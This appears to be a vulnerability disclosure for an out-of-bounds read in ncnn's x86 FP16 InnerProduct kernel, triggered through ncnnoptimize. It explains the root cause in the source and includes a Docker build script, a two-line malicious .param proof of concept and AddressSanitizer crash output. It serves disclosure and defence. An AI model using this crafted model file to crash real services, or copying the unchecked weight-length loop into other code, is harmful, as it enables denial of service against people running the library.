Out-of-Bounds Read Crashes ncnnoptimize
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/innerproduct_fp.h:352 in innerproduct_fp16s_sse
Sanitizer verdict: SEGV on unknown address 0x50e000010000 (pc 0x55a5e5f6d87f bp 0x7ffe3b8dc6f0 sp 0x7ffe3b8ca140 T0)
Summary
An InnerProduct layer whose declared weight_data_size is far smaller than the input tensor it consumes makes the x86 FP16 SIMD kernel iterate over the input length while walking the transformed weight buffer, reading far past the weight allocation and terminating ncnnoptimize. The entry point is ncnnoptimize, which loads the .param file and then calls ModelWriter::shape_inference(), executing every layer's forward pass. The demonstrated impact is denial of service.
Detail
InnerProduct_x86::forward_fp16s() computes num_input from the weights (weight_data_size / num_output, src/layer/x86/innerproduct_x86.cpp:285), but the SIMD helper it calls recomputes num_input from the bottom blob instead, and uses that value to drive the loop that advances the weight pointer.
// src/layer/x86/innerproduct_fp.h:23
const int num_input = bottom_blob.w * bottom_blob.elempack;
const int outw = top_blob.w;
const int out_elempack = top_blob.elempack;
// src/layer/x86/innerproduct_fp.h:327
const unsigned short* kptr = weight_data_tm.row<const unsigned short>(p);
// src/layer/x86/innerproduct_fp.h:335
for (; i + 7 < num_input; i += 8)
// src/layer/x86/innerproduct_fp.h:352
__m256i _w0123 = _mm256_lddqu_si256((const __m256i*)kptr);
__m256i _w4567 = _mm256_lddqu_si256((const __m256i*)(kptr + 16));
// src/layer/x86/innerproduct_fp.h:371
kptr += 32;
weight_data_tm is sized during create_pipeline from the declared weight count — innerproduct_transform_kernel_fp16s_sse() reshapes weight_data to num_input x num_output and creates the packed tensor with that width. Nothing on the forward path checks that the tensor actually arriving at the layer has the same w the weights were built for. The only shape comparison, at src/layer/x86/innerproduct_x86.cpp:287, is a fast-path test for the 2D GEMM case; when it fails, execution falls through to the flatten path and into the helper above.
The PoC declares Input data 0 1 data 0=100000 and InnerProduct ip 1 1 data out 0=4 1=0 2=4: num_output = 4 and weight_data_size = 4, so the real per-output input length is 1 and each transformed weight row holds four unsigned short values — eight bytes. num_output = 4 selects out_elempack = 4, entering the branch at line 304. But bottom_blob.w is 100000, so the loop at line 335 runs 12500 times, each iteration reading 64 bytes at kptr and advancing kptr by 32 shorts. The first iteration already reads 56 bytes past the end of the eight-byte row, and the walk continues until it leaves the mapped region, producing the SEGV inside _mm256_lddqu_si256. Because the PoC passes null as the binary input, ncnnoptimize synthesises the four declared weights itself; no weight file is needed.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-out-of-bounds-read-crashes-ncnnoptimize && cd ncnn-poc-out-of-bounds-read-crashes-ncnnoptimize
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'PARAM'
7767517
2 2
Input data 0 1 data 0=100000
InnerProduct ip 1 1 data out 0=4 1=0 2=4
PARAM
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
shape_inference
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1==ERROR: AddressSanitizer: SEGV on unknown address 0x50e000010000 (pc 0x6463b9c3487f bp 0x7ffc3b5e8770 sp 0x7ffc3b5d61c0 T0)
==1==The signal is caused by a READ memory access.
#0 0x6463b9c3487f in _mm256_lddqu_si256(long long __vector(4) const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:1011
#1 0x6463b9c3487f in innerproduct_fp16s_sse /ncnn/src/layer/x86/innerproduct_fp.h:352
#2 0x6463b9e9983a in ncnn::InnerProduct_x86_avx512::forward_fp16s(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/innerproduct_x86_avx512.cpp:333
#3 0x6463b9e93e3a in ncnn::InnerProduct_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/innerproduct_x86_avx512.cpp:136
#4 0x6463b6ea1f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#5 0x6463b6e93b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#6 0x6463b6ef39e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#7 0x6463b6d853c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#8 0x6463b6e02eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#9 0x79b4cc4481c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#10 0x79b4cc44828a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#11 0x6463b6d82624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:1011 in _mm256_lddqu_si256(long long __vector(4) const*)
==1==ABORTING
Credit
Zheng Yu @ DepthFirst